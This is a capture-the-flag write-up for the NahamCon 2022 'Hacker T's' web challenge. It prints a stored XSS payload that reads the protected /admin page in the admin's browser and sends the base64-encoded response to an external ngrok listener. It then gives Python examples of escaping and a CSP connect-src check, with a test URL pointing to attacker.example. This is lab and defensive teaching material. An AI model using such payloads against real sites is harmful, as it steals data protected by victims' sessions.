
NahamCon CTF 2022: Hacker T's

TL;DR

  • User-controlled input is rendered without proper sanitization.
  • Stored XSS executes in an admin context.
  • Malicious JavaScript requests the protected /admin endpoint.
  • Flag is base64-encoded and exfiltrated to an attacker-controlled server.

Video Walkthrough

[Video: NahamCon CTF 2022 Hacker T's web walkthrough demonstrating stored XSS and admin endpoint flag exfiltration]

Description

We all love our hacker t-shirts. Make your own custom ones.

Solution

// Stored XSS payload: runs in the admin's browser when the custom t-shirt is viewed.
var xhr = new XMLHttpRequest();
// Same-origin request to the protected endpoint; the admin's session makes it succeed.
xhr.open("GET", "http://localhost:5000/admin");
xhr.onload = function () {
    // Base64-encode the response body (which contains the flag) so it survives in a query string.
    var flag = btoa(xhr.responseText);
    // Send it out-of-band to the attacker-controlled listener.
    var exfil = new XMLHttpRequest();
    exfil.open("GET", "http://9106-81-103-153-174.ngrok.io?flag=" + flag);
    exfil.send();
};
xhr.send();
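From the defender's side, the two fixes that break this chain are escaping the t-shirt text before it is rendered and a Content-Security-Policy whose connect-src confines XMLHttpRequest to the app's own origin. The following is an added example, not the challenge's own code; the render functions, the CSP string, the attacker.example host and the Flask-style localhost:5000 origin are assumptions or constructed values.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: custom t-shirt text carrying a script, as a user might submit it.
STORED_PAYLOAD = "<script>alert(1)</script>"
PAGE_ORIGIN = "http://localhost:5000"  # the challenge app's origin, as used in the writeup

def render_preview_unsafe(text: str) -> str:
    """The bug: user text is interpolated into HTML unescaped, so a stored
    <script> tag executes for whoever views the shirt, including the admin."""
    return "<div class='shirt'>" + text + "</div>"

def render_preview_safe(text: str) -> str:
    """The fix: escape for the HTML text context before interpolating."""
    return "<div class='shirt'>" + html.escape(text, quote=True) + "</div>"

# Defense in depth (assumed policy): connect-src 'self' still lets admin pages call
# /admin on the same origin, but blocks an XMLHttpRequest to an external host.
CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'"

def _origin(url: str) -> str:
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}"

def csp_allows_connect(csp: str, page_origin: str, target_url: str) -> bool:
    """Minimal connect-src evaluator (handles *, 'self', 'none' and exact origins;
    not a complete CSP3 matcher). Returns True if the request would be permitted."""
    directives = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0]] = parts[1:]
    # connect-src falls back to default-src when absent; neither present = unrestricted.
    sources = directives.get("connect-src", directives.get("default-src", ["*"]))
    if sources == ["'none'"]:
        return False
    target = _origin(target_url)
    for src in sources:
        if src == "*" or src == target:
            return True
        if src == "'self'" and target == page_origin:
            return True
    return False

if __name__ == "__main__":
    print(render_preview_safe(STORED_PAYLOAD))
    print(csp_allows_connect(CSP, PAGE_ORIGIN, PAGE_ORIGIN + "/admin"))             # True
    print(csp_allows_connect(CSP, PAGE_ORIGIN, "http://attacker.example/?flag=x"))  # False
```

Escaping removes the execution primitive; the CSP limits where an injected script that slips through could send data, which is why both belong together.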